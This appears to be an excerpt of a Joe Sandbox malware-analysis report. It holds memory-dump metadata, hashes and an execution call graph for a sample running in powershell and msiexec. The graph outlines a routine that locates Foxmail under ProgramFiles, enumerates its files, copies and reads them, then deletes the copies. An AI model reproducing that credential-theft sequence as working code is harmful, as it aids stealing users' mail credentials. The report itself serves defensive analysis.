                                                              • Instruction ID: 03a483b99c51f86d0865e0781d6fd54583f7ba78044e46d32799b649154e1246
                                                              • Opcode Fuzzy Hash: 88796576ee28f406dd20b4d7705f360b7fbfa4238be7264981eeb0638a497b65
                                                              • Instruction Fuzzy Hash: 4FE01275B001049FCB00CB88D8409AEF772FB88314B108459D918A3751CB339816CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002300364.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a1d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 632de46ce3812a6976151b6772c823d0870d7472df66171196f1e424bed8e6e5
                                                              • Instruction ID: 57992f6387276a8d7606aafa958d448b872f3de7ed1dd20b797907a7e6659d16
                                                              • Opcode Fuzzy Hash: 632de46ce3812a6976151b6772c823d0870d7472df66171196f1e424bed8e6e5
                                                              • Instruction Fuzzy Hash: 7C216472500240EFCB01DF14DAC0B6BBFB5FB98324F20C569E8090B65AC336D886CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                              • API String ID: 0-2338339476
                                                              • Opcode ID: 7b5d77d3ce3c978e1d14f28599e4c36629827441fc30071c576ab8ffa782cd5e
                                                              • Instruction ID: 27eb4ef9a998cf987ea2db66019dab3b72cd93ad472fe342e76a68f4e259e63d
                                                              • Opcode Fuzzy Hash: 7b5d77d3ce3c978e1d14f28599e4c36629827441fc30071c576ab8ffa782cd5e
                                                              • Instruction Fuzzy Hash: D602C4B1B0420ADFCB2A8F69C4446AABBA2AF85710F14C86AD4558F295DB31DC45CFF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                              • API String ID: 0-3512890053
                                                              • Opcode ID: e6258a1657c421c0a13419de26d4ee450b807fea0461f3091c9cf592171a0da3
                                                              • Instruction ID: 3ffe404d77e7268bd79e6d0e27a893c9aaf528da3a0421d488fc2f90753d417a
                                                              • Opcode Fuzzy Hash: e6258a1657c421c0a13419de26d4ee450b807fea0461f3091c9cf592171a0da3
                                                              • Instruction Fuzzy Hash: 7EA14AB1B043068FCB3A5A69881466ABBE5BF81610F14847AD825CF2D5DF35CC85CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.k$-k
                                                              • API String ID: 0-3535620250
                                                              • Opcode ID: 12ecf327a6ebd624b219d751bed50ac0247a8cda807eab17f549f334a5d8a8e4
                                                              • Instruction ID: 810946081c218b4511abfd2dd4abbf6e3719fdda7ff55df851e7cf97ea76900f
                                                              • Opcode Fuzzy Hash: 12ecf327a6ebd624b219d751bed50ac0247a8cda807eab17f549f334a5d8a8e4
                                                              • Instruction Fuzzy Hash: B7D18D70A012189FDB18DB68C955B9ABBB2FB84304F1084A9D5096F3D5CB71ED86CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                              • API String ID: 0-1710924510
                                                              • Opcode ID: 0f13fb3d06668689307ccbcf8def06ad9324183bd15ef9eec32ff94cee5d18c7
                                                              • Instruction ID: 27185442985b8a1f534e3aa7ff423f1bd65f2c3eac61b2840f938a12e65eb92f
                                                              • Opcode Fuzzy Hash: 0f13fb3d06668689307ccbcf8def06ad9324183bd15ef9eec32ff94cee5d18c7
                                                              • Instruction Fuzzy Hash: 4071C2B1B00205DFDB29CE59E545B6ABBA2AF84711F1AC09BE884AB3D0C731DD81CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                              • API String ID: 0-1710924510
                                                              • Opcode ID: ba17371292086f8116e3ddf9b20e626a78f41d3a76cdff80b320c20ff90e63b3
                                                              • Instruction ID: bc2e24bfe6f3f94f75efb17a9d0de6675a356e50caa072dcae3ca2fee46d4c8c
                                                              • Opcode Fuzzy Hash: ba17371292086f8116e3ddf9b20e626a78f41d3a76cdff80b320c20ff90e63b3
                                                              • Instruction Fuzzy Hash: DF61B1B1B00206DFDB29CE59E545B6AB7A2AF84711F1AC09BE884AB3D0C731DD81CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                              • API String ID: 0-2461640029
                                                              • Opcode ID: 92e03798b527a5af0014636fb947c8fab6f515cb9ccbcfbd111c8b042d454523
                                                              • Instruction ID: 5f3e95bcb45c4e8bc626d17a63f59cce79b10d33f6f37127b93eab7aa006e984
                                                              • Opcode Fuzzy Hash: 92e03798b527a5af0014636fb947c8fab6f515cb9ccbcfbd111c8b042d454523
                                                              • Instruction Fuzzy Hash: F85103F0700206DFDB2A8E44E508B6677B2BF45315F5984ABE8895B6D0C731EC84CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                              • API String ID: 0-2098638132
                                                              • Opcode ID: f1a22e883f14f9eb2d88f45dff43b06875d6dae19671acc85c5bf3be72d92113
                                                              • Instruction ID: 6e79dbf493abf092da3a225bce5d66da2e4c8301e288f3832c713ae320cbf2fb
                                                              • Opcode Fuzzy Hash: f1a22e883f14f9eb2d88f45dff43b06875d6dae19671acc85c5bf3be72d92113
                                                              • Instruction Fuzzy Hash: C851E1B0B04205DFDB299E28D454BAABBF2EF85700F198556E8859B2D1DB31DC81CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                              • API String ID: 0-2923853403
                                                              • Opcode ID: 3b71a291dab90c6f269caaf0fc65cad6cff568f708888aa04508ef228a6a63cc
                                                              • Instruction ID: 0352d3564618fa61286ff7fa2f8f31e60adf817c23cf1c621870c8ed135f8dfb
                                                              • Opcode Fuzzy Hash: 3b71a291dab90c6f269caaf0fc65cad6cff568f708888aa04508ef228a6a63cc
                                                              • Instruction Fuzzy Hash: 1C41ADB170420AABDB2A5A7584003B6BBD6BFC5210F25886ED5458F2C6DF31CC8DDB52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                              • API String ID: 0-3272787073
                                                              • Opcode ID: 911cc86010f92de9d6291639444ba4bc214715cde805f2e68782006674d8aaae
                                                              • Instruction ID: 0d3deb6f17d81b0b2c0e42f8c129f764c889838202016f65d51a5283f4ce9b8d
                                                              • Opcode Fuzzy Hash: 911cc86010f92de9d6291639444ba4bc214715cde805f2e68782006674d8aaae
                                                              • Instruction Fuzzy Hash: 03317AB1B043A6DFDB2A0A29C44417AB7A2ABC1251B24887ECC058B2C5DF35CC86CF52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                              • API String ID: 0-3997570045
                                                              • Opcode ID: c5ba913f3bc526289881564c86ec9eaa53f4b081c18a059888fcc899d10ba972
                                                              • Instruction ID: 05880bef77e894e80d0767665df7663f6b823fa69644a354bc14401504e40ade
                                                              • Opcode Fuzzy Hash: c5ba913f3bc526289881564c86ec9eaa53f4b081c18a059888fcc899d10ba972
                                                              • Instruction Fuzzy Hash: 7731E4F0A14206DBDF2E8F14C545B69B7A2AB85B20F15C06AE8555F2D4C732EC45CF52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                              • API String ID: 0-2825857601
                                                              • Opcode ID: 05f968b3a97274c7833678151bb77d3e13c94d64e776ecffbb8baf21c4d954d6
                                                              • Instruction ID: 492c9c757e2fad975fcf69e63febc1f69b67f722254267f0999747a97c990984
                                                              • Opcode Fuzzy Hash: 05f968b3a97274c7833678151bb77d3e13c94d64e776ecffbb8baf21c4d954d6
                                                              • Instruction Fuzzy Hash: E921F4F2A14216DBDB3A4E05C545B76B7E5BFA1611F25402AE834CB1E5CB35CC80CEA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                              • API String ID: 0-3846404929
                                                              • Opcode ID: d266523d636644eca1cab9fba69c250cbc6ca32f58ef339c8ecb710f4b550532
                                                              • Instruction ID: 92eb8f773c580327b0852ec71d6978f2bbcb73e68804010c254c240741f88084
                                                              • Opcode Fuzzy Hash: d266523d636644eca1cab9fba69c250cbc6ca32f58ef339c8ecb710f4b550532
                                                              • Instruction Fuzzy Hash: 6E31B4B4B00115DFCB28DF68E844A6AFBA2FB88710F258156E845AB390C731DC42CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o^q$(o^q$(o^q$(o^q
                                                              • API String ID: 0-1978863864
                                                              • Opcode ID: 3115c34bad1f34d94fa49031eae1542f892cb7c1775238a30cbfb92f2a7c6f2c
                                                              • Instruction ID: 278e22a7597b87d6972743fbfb025d21f287f4f5f0f8aaf2acd23469761b1679
                                                              • Opcode Fuzzy Hash: 3115c34bad1f34d94fa49031eae1542f892cb7c1775238a30cbfb92f2a7c6f2c
                                                              • Instruction Fuzzy Hash: 43F12871704306DFCB2A8F68D855BAABBA2AF85310F14886AE5158B2D1DB31CD45CFF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                              • API String ID: 0-3859475322
                                                              • Opcode ID: 3723087d8f97d760130126b99252d2e5f9da51cc2c5d23ef22701f512534d171
                                                              • Instruction ID: f5d69d96eee94a1b19909b1c8805fdc054f6d9d871502f505af1de21b876bbb7
                                                              • Opcode Fuzzy Hash: 3723087d8f97d760130126b99252d2e5f9da51cc2c5d23ef22701f512534d171
                                                              • Instruction Fuzzy Hash: 65815CB1B142059FCB268A79881476A7BE3AF85310F1484BAE445CF2D1DF35CC55CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XRcq$XRcq$tP^q$$^q
                                                              • API String ID: 0-3596674671
                                                              • Opcode ID: 22a2c2dfd1fd7a04e9b2a260da9ce95699e4a827c1eb1809e941fef1bfd2d542
                                                              • Instruction ID: eb4c05229d5de40f615dff791bfaaf990406f00d9c2a4ec1451814cdab0af5e6
                                                              • Opcode Fuzzy Hash: 22a2c2dfd1fd7a04e9b2a260da9ce95699e4a827c1eb1809e941fef1bfd2d542
                                                              • Instruction Fuzzy Hash: F741A3B1A00205DBDB29CF59C148AAABBF2AF85712F55C069D405AF2D4D771ED48CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $^q$$^q$$^q$$^q
                                                              • API String ID: 0-2125118731
                                                              • Opcode ID: 1fb55ce36fd31f80dbe5f576f2e11f50ffba72df0201cdef89c971dbd618152d
                                                              • Instruction ID: d4810bbc4c129db46e9b3632a4734142b9fb5f636cf1836ae263a0ec09925f2c
                                                              • Opcode Fuzzy Hash: 1fb55ce36fd31f80dbe5f576f2e11f50ffba72df0201cdef89c971dbd618152d
                                                              • Instruction Fuzzy Hash: 562188B271020EABDB38657A8C04B27A7DA9BC0714F36C42AA505CF3C5DE36CC41DB20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                              • API String ID: 0-2049395529
                                                              • Opcode ID: 2288c85370bd8f34b4732482b6806416e7f201bd5829dac6b5cce4ea423726e0
                                                              • Instruction ID: eaa08aff9a5afd96353fd1cd825f7372321d02648f5d3b069eb67711a27a2090
                                                              • Opcode Fuzzy Hash: 2288c85370bd8f34b4732482b6806416e7f201bd5829dac6b5cce4ea423726e0
                                                              • Instruction Fuzzy Hash: B3018421B4E3991FC72F16281C345956FB29F8365031A04DBD041DF2ABCF15CD8A87A7

                                                              Execution Graph

                                                              Execution Coverage:1.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:6.5%
                                                              Total number of Nodes:184
                                                              Total number of Limit Nodes:1
                                                              execution_graph 6926 254c1c5b 6927 254c1c6b ___scrt_fastfail 6926->6927 6930 254c12ee 6927->6930 6929 254c1c87 6931 254c1324 ___scrt_fastfail 6930->6931 6932 254c13b7 GetEnvironmentVariableW 6931->6932 6956 254c10f1 6932->6956 6935 254c10f1 57 API calls 6936 254c1465 6935->6936 6937 254c10f1 57 API calls 6936->6937 6938 254c1479 6937->6938 6939 254c10f1 57 API calls 6938->6939 6940 254c148d 6939->6940 6941 254c10f1 57 API calls 6940->6941 6942 254c14a1 6941->6942 6943 254c10f1 57 API calls 6942->6943 6944 254c14b5 lstrlenW 6943->6944 6945 254c14d9 lstrlenW 6944->6945 6946 254c14d2 6944->6946 6947 254c10f1 57 API calls 6945->6947 6946->6929 6948 254c1501 lstrlenW lstrcatW 6947->6948 6949 254c10f1 57 API calls 6948->6949 6950 254c1539 lstrlenW lstrcatW 6949->6950 6951 254c10f1 57 API calls 6950->6951 6952 254c156b lstrlenW lstrcatW 6951->6952 6953 254c10f1 57 API calls 6952->6953 6954 254c159d lstrlenW lstrcatW 6953->6954 6955 254c10f1 57 API calls 6954->6955 6955->6946 6957 254c1118 ___scrt_fastfail 6956->6957 6958 254c1129 lstrlenW 6957->6958 6969 254c2c40 6958->6969 6961 254c1168 lstrlenW 6962 254c1177 lstrlenW FindFirstFileW 6961->6962 6963 254c11a0 6962->6963 6964 254c11e1 6962->6964 6965 254c11c7 FindNextFileW 6963->6965 6968 254c11aa 6963->6968 6964->6935 6965->6963 6967 254c11da FindClose 6965->6967 6967->6964 6968->6965 6971 254c1000 6968->6971 6970 254c1148 lstrcatW lstrlenW 6969->6970 6970->6961 6970->6962 6972 254c1022 ___scrt_fastfail 6971->6972 6973 254c10af 6972->6973 6974 254c102f lstrcatW lstrlenW 6972->6974 6975 254c10b5 lstrlenW 6973->6975 6986 254c10ad 6973->6986 6976 254c105a lstrlenW 6974->6976 6977 254c106b lstrlenW 6974->6977 7002 254c1e16 6975->7002 6976->6977 6988 254c1e89 lstrlenW 6977->6988 6980 254c10ca 6983 254c1e89 5 API calls 6980->6983 6980->6986 6981 254c1088 GetFileAttributesW 6982 254c109c 6981->6982 6981->6986 6982->6986 6994 254c173a 6982->6994 6985 254c10df 6983->6985 7007 254c11ea 6985->7007 6986->6968 6989 254c2c40 ___scrt_fastfail 6988->6989 6990 254c1ea7 lstrcatW lstrlenW 6989->6990 6991 254c1ed1 lstrcatW 6990->6991 6992 254c1ec2 6990->6992 6991->6981 6992->6991 6993 254c1ec7 lstrlenW 6992->6993 6993->6991 6995 254c1747 ___scrt_fastfail 6994->6995 7022 254c1cca 6995->7022 6998 254c199f 6998->6986 7000 254c1824 ___scrt_fastfail _strlen 7000->6998 7042 254c15da 7000->7042 7003 254c1e29 7002->7003 7006 254c1e4c 7002->7006 7004 254c1e2d lstrlenW 7003->7004 7003->7006 7005 254c1e3f lstrlenW 7004->7005 7004->7006 7005->7006 7006->6980 7008 254c120e ___scrt_fastfail 7007->7008 7009 254c1e89 5 API calls 7008->7009 7010 254c1220 GetFileAttributesW 7009->7010 7011 254c1235 7010->7011 7012 254c1246 7010->7012 7011->7012 7014 254c173a 35 API calls 7011->7014 7013 254c1e89 5 API calls 7012->7013 7015 254c1258 7013->7015 7014->7012 7016 254c10f1 56 API calls 7015->7016 7017 254c126d 7016->7017 7018 254c1e89 5 API calls 7017->7018 7019 254c127f ___scrt_fastfail 7018->7019 7020 254c10f1 56 API calls 7019->7020 7021 254c12e6 7020->7021 7021->6986 7023 254c1cf1 ___scrt_fastfail 7022->7023 7024 254c1d0f CopyFileW CreateFileW 7023->7024 7025 254c1d44 DeleteFileW 7024->7025 7026 254c1d55 GetFileSize 7024->7026 7031 254c1808 7025->7031 7027 254c1ede 22 API calls 7026->7027 7028 254c1d66 ReadFile 7027->7028 7029 254c1d7d CloseHandle DeleteFileW 7028->7029 7030 254c1d94 CloseHandle DeleteFileW 7028->7030 7029->7031 7030->7031 7031->6998 7032 254c1ede 7031->7032 7034 254c222f 7032->7034 7035 254c224e 7034->7035 7038 254c2250 7034->7038 7050 254c474f 7034->7050 7055 254c47e5 7034->7055 7035->7000 7037 254c2908 7039 254c35d2 __CxxThrowException@8 RaiseException 7037->7039 7038->7037 7062 254c35d2 7038->7062 7041 254c2925 7039->7041 7041->7000 7043 254c160c _strcat _strlen 7042->7043 7044 254c163c lstrlenW 7043->7044 7150 254c1c9d 7044->7150 7046 254c1655 lstrcatW lstrlenW 7047 254c1678 7046->7047 7048 254c167e lstrcatW 7047->7048 7049 254c1693 ___scrt_fastfail 7047->7049 7048->7049 7049->7000 7065 254c4793 7050->7065 7053 254c478f 7053->7034 7054 254c4765 7071 254c2ada 7054->7071 7060 254c56d0 _abort 7055->7060 7056 254c570e 7084 254c6368 7056->7084 7058 254c56f9 RtlAllocateHeap 7059 254c570c 7058->7059 7058->7060 7059->7034 7060->7056 7060->7058 7061 254c474f _abort 7 API calls 7060->7061 7061->7060 7063 254c35f2 RaiseException 7062->7063 7063->7037 7066 254c479f ___scrt_is_nonwritable_in_current_image 7065->7066 7078 254c5671 RtlEnterCriticalSection 7066->7078 7068 254c47aa 7079 254c47dc 7068->7079 7070 254c47d1 _abort 7070->7054 7072 254c2ae5 IsProcessorFeaturePresent 7071->7072 7073 254c2ae3 7071->7073 7075 254c2b58 7072->7075 7073->7053 7083 254c2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7075->7083 7077 254c2c3b 7077->7053 7078->7068 7082 254c56b9 RtlLeaveCriticalSection 7079->7082 7081 254c47e3 7081->7070 7082->7081 7083->7077 7087 254c5b7a GetLastError 7084->7087 7088 254c5b99 7087->7088 7089 254c5b93 7087->7089 7093 254c5bf0 SetLastError 7088->7093 7113 254c637b 7088->7113 7106 254c5e08 7089->7106 7094 254c5bf9 7093->7094 7094->7059 7098 254c5bb9 7101 254c5be7 SetLastError 7098->7101 7099 254c5bb3 7120 254c571e 7099->7120 7100 254c5bcf 7133 254c593c 7100->7133 7101->7094 7104 254c571e _free 17 API calls 7105 254c5be0 7104->7105 7105->7093 7105->7101 7138 254c5c45 7106->7138 7108 254c5e2f 7109 254c5e47 TlsGetValue 7108->7109 7112 254c5e3b 7108->7112 7109->7112 7110 254c2ada _ValidateLocalCookies 5 API calls 7111 254c5e58 7110->7111 7111->7088 7112->7110 7118 254c6388 _abort 7113->7118 7114 254c63c8 7116 254c6368 __dosmaperr 19 API calls 7114->7116 7115 254c63b3 RtlAllocateHeap 7117 254c5bab 7115->7117 7115->7118 7116->7117 7117->7099 7126 254c5e5e 7117->7126 7118->7114 7118->7115 7119 254c474f _abort 7 API calls 7118->7119 7119->7118 7121 254c5729 HeapFree 7120->7121 7122 254c5752 __dosmaperr 7120->7122 7121->7122 7123 254c573e 7121->7123 7122->7098 7124 254c6368 __dosmaperr 18 API calls 7123->7124 7125 254c5744 GetLastError 7124->7125 7125->7122 7127 254c5c45 _abort 5 API calls 7126->7127 7128 254c5e85 7127->7128 7129 254c5ea0 TlsSetValue 7128->7129 7130 254c5e94 7128->7130 7129->7130 7131 254c2ada _ValidateLocalCookies 5 API calls 7130->7131 7132 254c5bc8 7131->7132 7132->7099 7132->7100 7144 254c5914 7133->7144 7141 254c5c71 7138->7141 7143 254c5c75 __crt_fast_encode_pointer 7138->7143 7139 254c5c95 7142 254c5ca1 GetProcAddress 7139->7142 7139->7143 7140 254c5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 7140->7141 7141->7139 7141->7140 7141->7143 7142->7143 7143->7108 7145 254c5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 7144->7145 7146 254c5938 7145->7146 7147 254c58c4 7146->7147 7148 254c5758 _abort 20 API calls 7147->7148 7149 254c58e8 7148->7149 7149->7104 7151 254c1ca6 _strlen 7150->7151 7151->7046

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 254C1137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 254C1151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 254C1193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 254C11D0
                                                              • FindClose.KERNEL32(00000000), ref: 254C11DB
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: fd70afb94d967237788801b783f091b503c0bb86aecee2303f9de5db0e634899
                                                              • Instruction ID: ec4300f49cf532fb89eff248f353fd22908479185e7a670deb7e2d78e6029882
                                                              • Opcode Fuzzy Hash: fd70afb94d967237788801b783f091b503c0bb86aecee2303f9de5db0e634899
                                                              • Instruction Fuzzy Hash: 3E21E3715043486BC714EA64DC48F9BBBACFF84719F00096AB998D3190EF74E6048792

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 254C1434
                                                                • Part of subcall function 254C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 254C1137
                                                                • Part of subcall function 254C10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 254C1151
                                                                • Part of subcall function 254C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C115C
                                                                • Part of subcall function 254C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C116D
                                                                • Part of subcall function 254C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 254C117C
                                                                • Part of subcall function 254C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 254C1193
                                                                • Part of subcall function 254C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 254C11D0
                                                                • Part of subcall function 254C10F1: FindClose.KERNEL32(00000000), ref: 254C11DB
                                                              • lstrlenW.KERNEL32(?), ref: 254C14C5
                                                              • lstrlenW.KERNEL32(?), ref: 254C14E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 254C150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 254C1521
                                                              • lstrlenW.KERNEL32(?,?), ref: 254C1547
                                                              • lstrcatW.KERNEL32(00000000), ref: 254C1553
                                                              • lstrlenW.KERNEL32(?,?), ref: 254C1579
                                                              • lstrcatW.KERNEL32(00000000), ref: 254C1585
                                                              • lstrlenW.KERNEL32(?,?), ref: 254C15AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 254C15B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: 90f5156481a7497792fca6e18ff67b99a75ba271929dbc8c22e6888cb69fc329
                                                              • Instruction ID: 044883d803ec31b23edbfc7f3d29d95c2cd847be016c1ac2b2ec27fdb2c0c4ae
                                                              • Opcode Fuzzy Hash: 90f5156481a7497792fca6e18ff67b99a75ba271929dbc8c22e6888cb69fc329
                                                              • Instruction Fuzzy Hash: B781B676A4035CA9DB20D7A1DC85FEFB379EF84B01F0015DAF908E7190EA716A84CB95
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 254C61DA
